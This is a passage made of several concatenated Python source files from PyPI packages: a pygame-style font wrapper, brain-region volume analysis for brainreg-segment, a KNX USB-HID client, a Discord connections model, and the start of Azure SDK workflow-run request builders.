    Uninitialize the font module (safe to call when not initialised).
    """
    autoquit()
def check_font():
    """Raise SDLError if the font module has not been initialised."""
    if get_init():
        return
    raise SDLError("font not initialized")
def get_default_font():
    """ get_default_font() -> string

    Return the filename of the bundled default font.
    """
    return _font_defaultname
class Font(object):
    """ pygame.font.Font(filename, size): return Font
    pygame.font.Font(object, size): return Font
    create a new Font object from a file"""

    # Underlying SDL_ttf font handle, and the open file object the font was
    # loaded from (kept alive so SDL can keep reading from it).
    _sdl_font = None
    _font_file = None

    def __init__(self, font, fontsize):
        check_font()
        if not isinstance(fontsize, int):
            raise TypeError("expected an integer, but got %r" % type(fontsize))

        if fontsize < 1:
            fontsize = 1

        file_obj = None
        if font is None or font == _font_defaultname:
            file_obj = getResource(_font_defaultname)
            self._font_file = file_obj
            # Scaling as from pygame/src/font.c
            fontsize = int(fontsize * 0.6875)
            if fontsize < 1:
                fontsize = 1
        elif isinstance(font, (bytes_, unicode_)):
            filepath = rwops_encode_file_path(font)
            # According to the pygame comments, we need to ensure the
            # file exists and is readable before calling out to SDL
            f = open(filepath, 'r')
            # pygame raises IOError if this fails, so we don't catch the
            # exception
            f.close()
            self._sdl_font = sdl.TTF_OpenFont(filepath, fontsize)
        else:
            # Assume a file-like object was passed in.
            file_obj = font
        if file_obj:
            # Get a new handle on the file to load the font from.
            # Otherwise, if the file handle is closed elsewhere, font
            # rendering will segfault.
            if self._font_file is None:
                file_obj = open(os.path.abspath(file_obj.name), 'rb')
                self._font_file = file_obj
            rwops = rwops_from_file(file_obj)
            # The second argument (1) asks SDL to free the RWops when done.
            self._sdl_font = sdl.TTF_OpenFontRW(rwops, 1, fontsize)
        if not self._sdl_font:
            raise SDLError.from_sdl_error()

    def __del__(self):
        # Only close the SDL font while TTF is still initialised; during
        # interpreter shutdown the module globals may already be torn down.
        if _font_initialised and self._sdl_font:
            sdl.TTF_CloseFont(self._sdl_font)
        if self._font_file:
            self._font_file.close()
        self._font_file = None
        self._sdl_font = None

    def set_bold(self, bold):
        """Font.set_bold(bool): return None
        enable fake rendering of bold text"""
        style = sdl.TTF_GetFontStyle(self._sdl_font)
        if bold:
            style = style | sdl.TTF_STYLE_BOLD
        elif style & sdl.TTF_STYLE_BOLD:
            # XOR clears the flag only when it is currently set.
            style = style ^ sdl.TTF_STYLE_BOLD
        sdl.TTF_SetFontStyle(self._sdl_font, style)

    def get_bold(self):
        """Font.get_bold(): return bool
        check if text will be rendered bold"""
        style = sdl.TTF_GetFontStyle(self._sdl_font)
        return style & sdl.TTF_STYLE_BOLD != 0

    def set_underline(self, underline):
        """Font.set_underline(bool): return None
        control if text is rendered with an underline"""
        style = sdl.TTF_GetFontStyle(self._sdl_font)
        if underline:
            style = style | sdl.TTF_STYLE_UNDERLINE
        elif style & sdl.TTF_STYLE_UNDERLINE:
            style = style ^ sdl.TTF_STYLE_UNDERLINE
        sdl.TTF_SetFontStyle(self._sdl_font, style)

    def get_underline(self):
        """Font.get_underline(): return bool
        check if text will be rendered with an underline"""
        style = sdl.TTF_GetFontStyle(self._sdl_font)
        return style & sdl.TTF_STYLE_UNDERLINE != 0

    def set_italic(self, italic):
        """Font.set_italic(bool): return None
        enable fake rendering of italic text"""
        style = sdl.TTF_GetFontStyle(self._sdl_font)
        if italic:
            style = style | sdl.TTF_STYLE_ITALIC
        elif style & sdl.TTF_STYLE_ITALIC:
            style = style ^ sdl.TTF_STYLE_ITALIC
        sdl.TTF_SetFontStyle(self._sdl_font, style)

    def get_italic(self):
        """Font.get_italic(): return bool
        check if text will be rendered italic"""
        style = sdl.TTF_GetFontStyle(self._sdl_font)
        return style & sdl.TTF_STYLE_ITALIC != 0

    def metrics(self, text):
        """ metrics(text) -> list
        Gets the metrics for each character in the passed string.
        """
        if not isinstance(text, (bytes_, unicode_)):
            raise TypeError("text must be a string or unicode")
        if isinstance(text, bytes_):
            # Upstream assumes latin-1. They be crazy.
            text = text.decode('UTF-8')
        results = []
        minx, maxx, miny, maxy, advance = [ffi.new('int*') for i in range(5)]
        for i, ch in enumerate(text):
            # Characters outside UCS-2, or glyphs SDL cannot measure,
            # produce a None entry (matching pygame's behaviour).
            if is_ucs_2(ch) and not \
                    sdl.TTF_GlyphMetrics(self._sdl_font, ord(ch),
                                         minx, maxx, miny, maxy,
                                         advance):
                results.append((minx[0], maxx[0], miny[0],
                                maxy[0], advance[0]))
            else:
                results.append(None)
        return results

    def get_linesize(self):
        """ get_linesize() -> int
        get the line space of the font text
        """
        return sdl.TTF_FontLineSkip(self._sdl_font)

    def get_height(self):
        """ get_height() -> int
        get the height of the font
        """
        return sdl.TTF_FontHeight(self._sdl_font)

    def get_ascent(self):
        """ get_ascent() -> int
        get the ascent of the font
        """
        return sdl.TTF_FontAscent(self._sdl_font)

    def get_descent(self):
        """ get_descent() -> int
        get the descent of the font
        """
        return sdl.TTF_FontDescent(self._sdl_font)

    def size(self, text):
        """Font.size(text): return (width, height)
        determine the amount of space needed to render text"""
        if not isinstance(text, (bytes_, unicode_)):
            raise TypeError("text must be a string or unicode")
        if isinstance(text, unicode_):
            text = text.encode('utf-8', 'replace')
        w = ffi.new("int*")
        h = ffi.new("int*")
        ecode = sdl.TTF_SizeUTF8(self._sdl_font, text, w, h)
        if ecode == -1:
            raise SDLError(ffi.string(sdl.TTF_GetError()))
        return int(w[0]), int(h[0])

    def render(self, text, antialias, color, background=None):
        """Font.render(text, antialias, color, background=None): return Surface
        draw text on a new Surface"""
        color = Color(color)
        fg = ffi.new("SDL_Color [1]")
        bg = ffi.new("SDL_Color [1]")
        fg[0].r = color.r
        fg[0].g = color.g
        fg[0].b = color.b
        if background:
            try:
                background = Color(background)
                bg[0].r = background.r
                bg[0].g = background.g
                bg[0].b = background.b
            except (TypeError, ValueError):
                # Same error behaviour as pygame
                bg[0].r = 0
                bg[0].g = 0
                bg[0].b = 0
        else:
            bg[0].r = 0
            bg[0].g = 0
            bg[0].b = 0
        if text is None or text == '':
            # Just return a surface of width 1 x font height
            height = sdl.TTF_FontHeight(self._sdl_font)
            surf = Surface((1, height))
            if background and isinstance(background, Color):
                surf.fill(background)
            else:
                # clear the colorkey
                surf.set_colorkey(flags=sdl.SDL_SRCCOLORKEY)
            return surf
        if not isinstance(text, (bytes_, unicode_)):
            raise TypeError("text must be a string or unicode")
        if isinstance(text, unicode_):
            text = text.encode('utf-8', 'replace')
            if utf_8_needs_UCS_4(text):
                raise UnicodeError("A Unicode character above '\\uFFFF' was found;"
                                   " not supported")
        if b'\x00' in text:
            raise ValueError("A null character was found in the text")
        if antialias:
            if background is None:
                sdl_surf = sdl.TTF_RenderUTF8_Blended(self._sdl_font,
                                                      text, fg[0])
            else:
                sdl_surf = sdl.TTF_RenderUTF8_Shaded(self._sdl_font,
                                                     text, fg[0], bg[0])
        else:
            sdl_surf = sdl.TTF_RenderUTF8_Solid(self._sdl_font,
                                                text, fg[0])
        if not sdl_surf:
            raise SDLError(ffi.string(sdl.TTF_GetError()))
        surf = Surface._from_sdl_surface(sdl_surf)
        if not antialias and background is not None:
            # Solid rendering uses a palette: slot the background colour in
            # and make it the colorkey so it is transparent.
            surf.set_colorkey()
            surf.set_palette([(bg[0].r, bg[0].g, bg[0].b)])
        return surf


# for ftfont to be used as drop-in replacement
FontType = Font
|
PypiClean
|
/brainreg-segment-0.2.18.tar.gz/brainreg-segment-0.2.18/brainreg_segment/regions/analysis.py
|
import numpy as np
import pandas as pd
from brainglobe_utils.general.list import unique_elements_lists
from brainglobe_utils.pandas.misc import initialise_df
from napari.qt.threading import thread_worker
from skimage.measure import regionprops_table
from brainreg_segment.atlas.utils import lateralise_atlas_image
@thread_worker
def region_analysis(
    label_layers,
    annotations_layer_image,
    atlas,
    hemispheres,
    regions_directory,
    output_csv_file=None,
    volumes=True,
    summarise=True,
):
    """Run per-region analysis for each annotated label layer.

    Writes one brain-area volume CSV per layer into *regions_directory*
    (when *volumes* is set) and, when *summarise* is set and
    *output_csv_file* is given, a summary CSV across all layers.
    """
    regions_directory.mkdir(parents=True, exist_ok=True)

    if volumes:
        print("Calculating region volume distribution")
        print(f"Saving summary volumes to: {regions_directory}")
        for layer in label_layers:
            analyse_region_brain_areas(
                layer,
                annotations_layer_image,
                hemispheres,
                regions_directory,
                atlas,
            )

    if summarise and output_csv_file is not None:
        print("Summarising regions")
        summarise_brain_regions(
            label_layers, output_csv_file, atlas.resolution
        )

    print("Finished!\n")
def summarise_brain_regions(label_layers, filename, atlas_resolution):
    """Write a CSV summarising region properties for every label layer.

    Volumes are converted to mm^3 and bounding-box/centroid coordinates are
    scaled from voxels to micrometres using *atlas_resolution*.
    """
    summaries = [
        summarise_single_brain_region(layer) for layer in label_layers
    ]
    if check_list_only_nones(summaries):
        print("No regions to summarise")
        return

    # pd.concat silently drops the None entries for empty layers.
    result = pd.concat(summaries)

    # TODO: use atlas.space to make these more intuitive
    volume_header = "volume_mm3"
    length_columns = [
        "axis_0_min_um",
        "axis_1_min_um",
        "axis_2_min_um",
        "axis_0_max_um",
        "axis_1_max_um",
        "axis_2_max_um",
        "axis_0_center_um",
        "axis_1_center_um",
        "axis_2_center_um",
    ]
    result.columns = ["region"] + [volume_header] + length_columns

    voxel_volume_in_mm = np.prod(atlas_resolution) / (1000**3)
    result[volume_header] = result[volume_header] * voxel_volume_in_mm

    for axis, axis_resolution in enumerate(atlas_resolution):
        prefix = f"axis_{axis}"
        matching_columns = [
            column for column in length_columns if column.startswith(prefix)
        ]
        if not matching_columns:
            continue
        scale = float(axis_resolution)
        assert scale > 0
        for column in matching_columns:
            result[column] = result[column] * scale

    result.to_csv(filename, index=False)
def check_list_only_nones(input_list):
    """Return True when every element of *input_list* is None (or it is empty)."""
    for value in input_list:
        if value is not None:
            return False
    return True
def summarise_single_brain_region(
    label_layer,
    ignore_empty=True,
    properties_to_fetch=("area", "bbox", "centroid"),
):
    """Summarise one label layer's regions via scikit-image regionprops.

    :param label_layer: napari labels layer (with segmented regions)
    :param ignore_empty: If True, return None for layers with no labelled
        voxels instead of summarising them.
    :param properties_to_fetch: region properties to extract. The default
        is now a tuple — the previous mutable list default was a shared
        mutable-default-argument hazard.
    :return: DataFrame with a leading "region" column (the layer name),
        or None when the layer is empty and *ignore_empty* is set.
    """
    data = np.asarray(label_layer.data)
    if ignore_empty and data.sum() == 0:
        return None

    regions_table = regionprops_table(
        data.astype(np.uint16), properties=list(properties_to_fetch)
    )
    df = pd.DataFrame.from_dict(regions_table)
    df.insert(0, "region", label_layer.name)
    return df
def analyse_region_brain_areas(
    label_layer,
    annotations_layer_image,
    hemispheres,
    destination_directory,
    atlas,
    extension=".csv",
    ignore_empty=True,
):
    """
    Break one segmented region down by atlas brain area and hemisphere,
    writing a per-structure volume CSV named after the layer.

    :param label_layer: napari labels layer (with segmented regions)
    :param annotations_layer_image: atlas annotation image aligned to the data
    :param hemispheres: hemisphere annotation image (left/right values)
    :param destination_directory: directory the CSV is written into
    :param atlas: BrainGlobe atlas (structures, resolution, hemisphere values)
    :param extension: output file extension
    :param ignore_empty: If True, don't analyse empty regions
    """
    data = label_layer.data
    if ignore_empty:
        if data.sum() == 0:
            return

    name = label_layer.name

    # Keep only the atlas annotations under the segmented region.
    masked_annotations = data.astype(bool) * annotations_layer_image

    annotations_left, annotations_right = lateralise_atlas_image(
        masked_annotations,
        hemispheres,
        left_hemisphere_value=atlas.left_hemisphere_value,
        right_hemisphere_value=atlas.right_hemisphere_value,
    )

    # Voxel counts per atlas structure, per hemisphere.
    unique_vals_left, counts_left = np.unique(
        annotations_left, return_counts=True
    )
    unique_vals_right, counts_right = np.unique(
        annotations_right, return_counts=True
    )
    voxel_volume_in_mm = np.prod(atlas.resolution) / (1000**3)

    df = initialise_df(
        "structure_name",
        "left_volume_mm3",
        "left_percentage_of_total",
        "right_volume_mm3",
        "right_percentage_of_total",
        "total_volume_mm3",
        "percentage_of_total",
    )

    sampled_structures = unique_elements_lists(
        list(unique_vals_left) + list(unique_vals_right)
    )
    total_volume_region = get_total_volume_regions(
        unique_vals_left, unique_vals_right, counts_left, counts_right
    )

    for atlas_value in sampled_structures:
        # 0 is the background label, not a structure.
        if atlas_value != 0:
            try:
                df = add_structure_volume_to_df(
                    df,
                    atlas_value,
                    atlas.structures,
                    unique_vals_left,
                    unique_vals_right,
                    counts_left,
                    counts_right,
                    voxel_volume_in_mm,
                    total_volume_voxels=total_volume_region,
                )
            except KeyError:
                # Annotation values can fall outside the structure reference
                # (e.g. edge artefacts); skip them rather than failing.
                print(
                    f"Value: {atlas_value} is not in the atlas structure"
                    f" reference file. Not calculating the volume"
                )

    filename = destination_directory / (name + extension)
    df.to_csv(filename, index=False)
def get_total_volume_regions(
    unique_vals_left,
    unique_vals_right,
    counts_left,
    counts_right,
):
    """Total number of labelled (non-background) voxels across hemispheres.

    :param unique_vals_left/right: unique annotation values per hemisphere
        (as returned by ``np.unique``)
    :param counts_left/right: matching voxel counts per hemisphere
    :return: sum of all counts excluding the background label (0)

    Previously this assumed 0 was always present in both hemispheres and
    raised IndexError otherwise (e.g. a region entirely within one
    hemisphere's labelled area); the background count is now only dropped
    when the 0 label actually occurs.
    """

    def _foreground_counts(unique_vals, counts):
        # Drop the count for the background label (0) when present.
        zero_indices = np.where(unique_vals == 0)[0]
        counts = list(counts)
        if zero_indices.size:
            counts.pop(int(zero_indices[0]))
        return counts

    return sum(
        _foreground_counts(unique_vals_left, counts_left)
        + _foreground_counts(unique_vals_right, counts_right)
    )
def add_structure_volume_to_df(
    df,
    atlas_value,
    atlas_structures,
    unique_vals_left,
    unique_vals_right,
    counts_left,
    counts_right,
    voxel_volume,
    total_volume_voxels=None,
):
    """Append one per-structure row (volumes and percentages) to *df*.

    Raises KeyError when *atlas_value* is not in *atlas_structures*;
    percentages are 0 when *total_volume_voxels* is None.
    Returns the new DataFrame.
    """
    structure_name = atlas_structures[atlas_value]["name"]

    left_volume, left_pct = get_volume_in_hemisphere(
        atlas_value,
        unique_vals_left,
        counts_left,
        total_volume_voxels,
        voxel_volume,
    )
    right_volume, right_pct = get_volume_in_hemisphere(
        atlas_value,
        unique_vals_right,
        counts_right,
        total_volume_voxels,
        voxel_volume,
    )
    total_pct = (
        left_pct + right_pct if total_volume_voxels is not None else 0
    )

    row = pd.DataFrame(
        {
            "structure_name": [structure_name],
            "left_volume_mm3": [left_volume],
            "left_percentage_of_total": [left_pct],
            "right_volume_mm3": [right_volume],
            "right_percentage_of_total": [right_pct],
            "total_volume_mm3": [left_volume + right_volume],
            "percentage_of_total": [total_pct],
        }
    )
    return pd.concat([df, row], ignore_index=True)
def get_volume_in_hemisphere(
    atlas_value, unique_vals, counts, total_volume_voxels, voxel_volume
):
    """Return (volume, percentage) of *atlas_value* in one hemisphere.

    (0, 0) when the value does not occur in *unique_vals*; percentage is 0
    when *total_volume_voxels* is None.
    """
    try:
        idx = np.where(unique_vals == atlas_value)[0][0]
        volume = counts[idx] * voxel_volume
        percentage = (
            100 * (counts[idx] / total_volume_voxels)
            if total_volume_voxels is not None
            else 0
        )
    except IndexError:
        volume, percentage = 0, 0
    return volume, percentage
|
PypiClean
|
/automate_knx_plugin-0.9.1-py3-none-any.whl/knx_plugin/client/usbhid.py
|
import asyncio
import logging
import knx_stack
from knx_plugin.client import Client as Parent
class MsgNotEncoded(Exception):
    """Raised when a KNX message could not be encoded."""
class Client(Parent):
    """KNX client speaking the USB-HID framing.

    On the wire, messages are newline-separated string representations
    padded to a fixed length (see ``encode``) — presumably the USB HID
    report size; TODO confirm.
    """

    def data_received(self, data):
        # Decode the raw chunk, then dispatch only confirmations and
        # indications to the registered tasks (requests/others are dropped).
        msgs = self.decode(data)
        (reqs, cons, inds, others) = self.filter(msgs)
        for task in self._tasks:
            for msg in cons:
                self._loop.create_task(task(msg))
            for msg in inds:
                self._loop.create_task(task(msg))

    def decode(self, data):
        """Decode *data* (bytes) into a list of knx_stack messages.

        Malformed messages are logged and skipped rather than aborting
        the whole chunk.
        """
        msgs = list()
        str_msgs = data.decode()
        splitted_data = str_msgs.split("\n")
        all_msgs = list()
        for msg in splitted_data:
            try:
                if msg:
                    octects_msg = knx_stack.Msg.make_from_str(msg)
                    self.logger.debug("received: {}".format(octects_msg))
                    msgs = knx_stack.decode_msg(self._state, octects_msg)
                    if msgs:
                        all_msgs.extend(msgs)
            except IndexError as e:
                self.logger.error(str(e) + " decoding msg: " + str(msg))
            except ValueError as e:
                self.logger.error(str(e) + " decoding msg: " + str(msg))
        return all_msgs

    def encode(self, msg):
        """Encode *msg* and pad it with '0' to the fixed frame length."""
        knx_msg = super(Client, self).encode(msg)
        self.logger.debug("sent: {}".format(knx_msg))
        knx_msg = str(knx_msg)
        # NOTE(review): assumes the encoded message never exceeds 112
        # characters — a longer message would receive no padding at all.
        padding = 112 - len(knx_msg)
        padded_msg = knx_msg + "0" * padding
        padded_msg += "\n"
        return padded_msg

    async def write(self, msgs, *args):
        """Write group-value-write requests once the transport is ready.

        Messages of any other type are silently ignored.
        """
        await self._wait_for_transport()
        for msg in msgs:
            if isinstance(msg, knx_stack.layer.application.a_group_value_write.req.Msg):
                knx_msg = str(self.encode(msg))
                self.logger.info("written {}".format(knx_msg))
                self._transport.write(knx_msg.encode())
class ClientExample(object):
    """Manual example driving the Client against localhost:5555.

    NOTE(review): ``run`` relies on the module-level ``loop`` created in
    the ``__main__`` guard below, so this class is not usable as a
    library as-is.
    """

    def __init__(self):
        self._transport = None
        self._protocol = None

    def send_msg(self, msg, *args):
        # args[0] carries the knx_stack State used for encoding.
        state = args[0]
        new_state = state
        final_msg = None
        # Only group-value read/write requests are encoded and written.
        if isinstance(msg, knx_stack.layer.application.a_group_value_write.req.Msg):
            final_msg = knx_stack.encode_msg(state, msg)
        elif isinstance(msg, knx_stack.layer.application.a_group_value_read.req.Msg):
            final_msg = knx_stack.encode_msg(state, msg)
        if final_msg:
            self._transport.write(str(final_msg).encode())
        return new_state

    async def run(self):
        # Connect to the server (presumably a KNX USB-HID gateway stub on
        # localhost:5555 — TODO confirm).
        self._transport, self._protocol = await loop.create_connection(
            lambda: Client(None, []), "localhost", 5555
        )
        # Build a minimal KNX state: one association (0x0E89 -> ASAP 1)
        # carrying a DPT_Switch datapoint.
        address_table = knx_stack.AddressTable(0x0000, [], 255)
        association_table = knx_stack.AssociationTable(address_table, {})
        new_association_table = association_table.associate(0x0E89, 1)
        from knx_stack.datapointtypes import DPT_Switch

        state = knx_stack.State(
            knx_stack.Medium.usb_hid, new_association_table, {1: DPT_Switch}
        )
        switch = DPT_Switch()
        switch.bits.action = DPT_Switch.Action.on
        req_msg = knx_stack.layer.application.a_group_value_write.req.Msg(
            asap=1, dpt=switch
        )
        # Send the same "switch on" request every three seconds, forever.
        while True:
            self.send_msg(req_msg, state)
            await asyncio.sleep(3)
if __name__ == "__main__":
    import sys

    # Log everything to stdout and run the example client forever.
    root = logging.getLogger()
    root.setLevel(logging.DEBUG)
    handler = logging.StreamHandler(sys.stdout)
    root.addHandler(handler)
    # NOTE: ``loop`` is read as a module global by ClientExample.run().
    loop = asyncio.get_event_loop()
    loop.create_task(ClientExample().run())
    loop.run_forever()
|
PypiClean
|
/user_discord-2.0.6.tar.gz/user_discord-2.0.6/user_discord/discord/connections.py
|
from __future__ import annotations
from typing import TYPE_CHECKING, List, Optional
from .enums import ConnectionType, try_enum
from .integrations import Integration
from .metadata import Metadata
from .utils import MISSING
if TYPE_CHECKING:
from .guild import Guild
from .state import ConnectionState
from .types.integration import ConnectionIntegration as IntegrationPayload
from .types.user import Connection as ConnectionPayload, PartialConnection as PartialConnectionPayload
__all__ = (
'PartialConnection',
'Connection',
)
class PartialConnection:
    """Represents a partial Discord profile connection.

    This is the info you get for other users' connections.

    .. versionadded:: 2.0

    .. container:: operations

        .. describe:: x == y

            Checks if two connections are equal.

        .. describe:: x != y

            Checks if two connections are not equal.

        .. describe:: hash(x)

            Return the connection's hash.

        .. describe:: str(x)

            Returns the connection's name.

    Attributes
    ----------
    id: :class:`str`
        The connection's account ID.
    name: :class:`str`
        The connection's account name.
    type: :class:`ConnectionType`
        The connection service type (e.g. youtube, twitch, etc.).
    verified: :class:`bool`
        Whether the connection is verified.
    visible: :class:`bool`
        Whether the connection is visible on the user's profile.
    metadata: Optional[:class:`Metadata`]
        Various metadata about the connection.

        The contents of this are always subject to change.
    """

    __slots__ = ('id', 'name', 'type', 'verified', 'visible', 'metadata')

    def __init__(self, data: PartialConnectionPayload):
        self._update(data)

    def __str__(self) -> str:
        return self.name

    def __repr__(self) -> str:
        return f'<{self.__class__.__name__} id={self.id!r} name={self.name!r} type={self.type!r} visible={self.visible}>'

    def __hash__(self) -> int:
        return hash((self.type.value, self.id))

    def __eq__(self, other: object) -> bool:
        return (
            isinstance(other, PartialConnection)
            and self.id == other.id
            and self.name == other.name
        )

    def __ne__(self, other: object) -> bool:
        return not self.__eq__(other)

    def _update(self, data: PartialConnectionPayload):
        self.id: str = data['id']
        self.name: str = data['name']
        self.type: ConnectionType = try_enum(ConnectionType, data['type'])
        self.verified: bool = data['verified']
        # If we have a partial connection, it's visible
        self.visible: bool = True
        self.metadata: Optional[Metadata] = Metadata(data['metadata']) if 'metadata' in data else None

    @property
    def url(self) -> Optional[str]:
        """Optional[:class:`str`]: Returns a URL linking to the connection's profile, if available."""
        # Per-service URL templates, formatted with this connection's
        # ``id`` and ``name`` (unused placeholders are simply ignored).
        templates = {
            ConnectionType.twitch: 'https://www.twitch.tv/{name}',
            ConnectionType.youtube: 'https://www.youtube.com/{id}',
            ConnectionType.skype: 'skype:{id}?userinfo',
            ConnectionType.steam: 'https://steamcommunity.com/profiles/{id}',
            ConnectionType.reddit: 'https://www.reddit.com/u/{name}',
            ConnectionType.facebook: 'https://www.facebook.com/{name}',
            ConnectionType.twitter: 'https://twitter.com/{name}',
            ConnectionType.spotify: 'https://open.spotify.com/user/{id}',
            ConnectionType.xbox: 'https://account.xbox.com/en-US/Profile?Gamertag={name}',
            ConnectionType.github: 'https://github.com/{name}',
            ConnectionType.tiktok: 'https://tiktok.com/@{name}',
        }
        template = templates.get(self.type)
        if template is None:
            return None
        return template.format(id=self.id, name=self.name)
class Connection(PartialConnection):
    """Represents a Discord profile connection.

    .. versionadded:: 2.0

    .. container:: operations

        .. describe:: x == y

            Checks if two connections are equal.

        .. describe:: x != y

            Checks if two connections are not equal.

        .. describe:: hash(x)

            Return the connection's hash.

        .. describe:: str(x)

            Returns the connection's name.

    Attributes
    ----------
    revoked: :class:`bool`
        Whether the connection is revoked.
    friend_sync: :class:`bool`
        Whether friends are synced over the connection.
    show_activity: :class:`bool`
        Whether activities from this connection will be shown in presences.
    two_way_link: :class:`bool`
        Whether the connection is authorized both ways (i.e. it's both a connection and an authorization).
    metadata_visible: :class:`bool`
        Whether the connection's metadata is visible.
    metadata: Optional[:class:`Metadata`]
        Various metadata about the connection.

        The contents of this are always subject to change.
    access_token: Optional[:class:`str`]
        The OAuth2 access token for the account, if applicable.
    integrations: List[:class:`Integration`]
        The integrations attached to the connection.
    """

    __slots__ = (
        '_state',
        'revoked',
        'friend_sync',
        'show_activity',
        'two_way_link',
        'metadata_visible',
        'access_token',
        'integrations',
    )

    def __init__(self, *, data: ConnectionPayload, state: ConnectionState):
        # _state must be assigned *before* _update(): _update() builds the
        # integrations list via self._resolve_guild(), which reads self._state.
        self._state = state
        # Likewise, default the access token before _update() so that a token
        # present in the payload is not clobbered back to None afterwards.
        self.access_token: Optional[str] = None
        self._update(data)

    def _update(self, data: ConnectionPayload):
        super()._update(data)
        self.revoked: bool = data.get('revoked', False)
        # Full connections carry an explicit visibility flag, overriding the
        # always-True default set by PartialConnection._update().
        self.visible: bool = bool(data.get('visibility', False))
        self.friend_sync: bool = data.get('friend_sync', False)
        self.show_activity: bool = data.get('show_activity', True)
        self.two_way_link: bool = data.get('two_way_link', False)
        self.metadata_visible: bool = bool(data.get('metadata_visibility', False))

        # Only sometimes in the payload; keep the previous value when absent.
        try:
            self.access_token: Optional[str] = data['access_token']
        except KeyError:
            pass
        self.integrations: List[Integration] = [
            Integration(data=i, guild=self._resolve_guild(i)) for i in data.get('integrations') or []
        ]

    def _resolve_guild(self, data: IntegrationPayload) -> Guild:
        """Resolve the guild an integration belongs to, preferring the cache."""
        from .guild import Guild

        state = self._state
        guild_data = data.get('guild')
        if not guild_data:
            return None  # type: ignore

        guild_id = int(guild_data['id'])
        guild = state._get_guild(guild_id)
        if guild is None:
            # Not cached; construct a partial Guild from the payload.
            guild = Guild(data=guild_data, state=state)
        return guild

    async def edit(
        self,
        *,
        name: str = MISSING,
        visible: bool = MISSING,
        friend_sync: bool = MISSING,
        show_activity: bool = MISSING,
        metadata_visible: bool = MISSING,
    ) -> Connection:
        """|coro|

        Edit the connection.

        All parameters are optional.

        Parameters
        ----------
        name: :class:`str`
            The new name of the connection. Only editable for certain connection types.
        visible: :class:`bool`
            Whether the connection is visible on your profile.
        show_activity: :class:`bool`
            Whether activities from this connection will be shown in presences.
        friend_sync: :class:`bool`
            Whether friends are synced over the connection.
        metadata_visible: :class:`bool`
            Whether the connection's metadata is visible.

        Raises
        ------
        HTTPException
            Editing the connection failed.

        Returns
        -------
        :class:`Connection`
            The edited connection.
        """
        # Only send fields the caller explicitly provided.
        payload = {}
        if name is not MISSING:
            payload['name'] = name
        if visible is not MISSING:
            payload['visibility'] = visible
        if show_activity is not MISSING:
            payload['show_activity'] = show_activity
        if friend_sync is not MISSING:
            payload['friend_sync'] = friend_sync
        if metadata_visible is not MISSING:
            payload['metadata_visibility'] = metadata_visible
        data = await self._state.http.edit_connection(self.type.value, self.id, **payload)
        return Connection(data=data, state=self._state)

    async def refresh(self) -> None:
        """|coro|

        Refreshes the connection. This updates the connection's :attr:`metadata`.

        Raises
        ------
        HTTPException
            Refreshing the connection failed.
        """
        await self._state.http.refresh_connection(self.type.value, self.id)

    async def delete(self) -> None:
        """|coro|

        Removes the connection.

        Raises
        ------
        HTTPException
            Deleting the connection failed.
        """
        await self._state.http.delete_connection(self.type.value, self.id)

    async def fetch_access_token(self) -> str:
        """|coro|

        Retrieves a new access token for the connection.

        Only applicable for connections of type :attr:`ConnectionType.twitch`,
        :attr:`ConnectionType.youtube`, and :attr:`ConnectionType.spotify`.

        Raises
        ------
        HTTPException
            Retrieving the access token failed.

        Returns
        -------
        :class:`str`
            The new access token.
        """
        data = await self._state.http.get_connection_token(self.type.value, self.id)
        return data['access_token']
|
PypiClean
|
/azure-mgmt-web-7.1.0.zip/azure-mgmt-web-7.1.0/azure/mgmt/web/v2022_09_01/operations/_workflow_runs_operations.py
|
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from ..._serialization import Serializer
from .._vendor import WebSiteManagementClientMixinABC, _convert_request, _format_url_section
# ``Literal`` moved into ``typing`` in Python 3.8; older interpreters get it
# from the ``typing_extensions`` backport.
if sys.version_info >= (3, 8):
    from typing import Literal  # pylint: disable=no-name-in-module, ungrouped-imports
else:
    from typing_extensions import Literal  # type: ignore # pylint: disable=ungrouped-imports
# Generic type variable for the deserialized response payload.
T = TypeVar("T")
# Signature of the optional ``cls`` callback that post-processes a response:
# it receives the pipeline response, the deserialized object, and headers.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
# Module-level serializer shared by the request builders below; client-side
# parameter validation is turned off.
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
    resource_group_name: str,
    name: str,
    workflow_name: str,
    subscription_id: str,
    *,
    top: Optional[int] = None,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Assemble the GET request that lists workflow runs for a site workflow.

    Path parameters are serialized into the ARM URL template; ``top`` and
    ``filter`` become the ``$top``/``$filter`` query options when supplied.
    Remaining ``kwargs`` are forwarded to :class:`~azure.core.rest.HttpRequest`.
    """
    header_map = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    query_map = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2022-09-01"] = kwargs.pop("api_version", query_map.pop("api-version", "2022-09-01"))
    accept = header_map.pop("Accept", "application/json")

    # URL template (overridable via ``template_url``) and its path arguments.
    template = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs",
    )  # pylint: disable=line-too-long
    path_args = {
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
        "resourceGroupName": _SERIALIZER.url(
            "resource_group_name",
            resource_group_name,
            "str",
            max_length=90,
            min_length=1,
            pattern=r"^[-\w\._\(\)]+[^\.]$",
        ),
        "name": _SERIALIZER.url("name", name, "str"),
        "workflowName": _SERIALIZER.url("workflow_name", workflow_name, "str"),
    }
    url = _format_url_section(template, **path_args)

    # Query string: api-version is always present, $top/$filter are optional.
    query_map["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    if top is not None:
        query_map["$top"] = _SERIALIZER.query("top", top, "int")
    if filter is not None:
        query_map["$filter"] = _SERIALIZER.query("filter", filter, "str")

    # Headers.
    header_map["Accept"] = _SERIALIZER.header("accept", accept, "str")

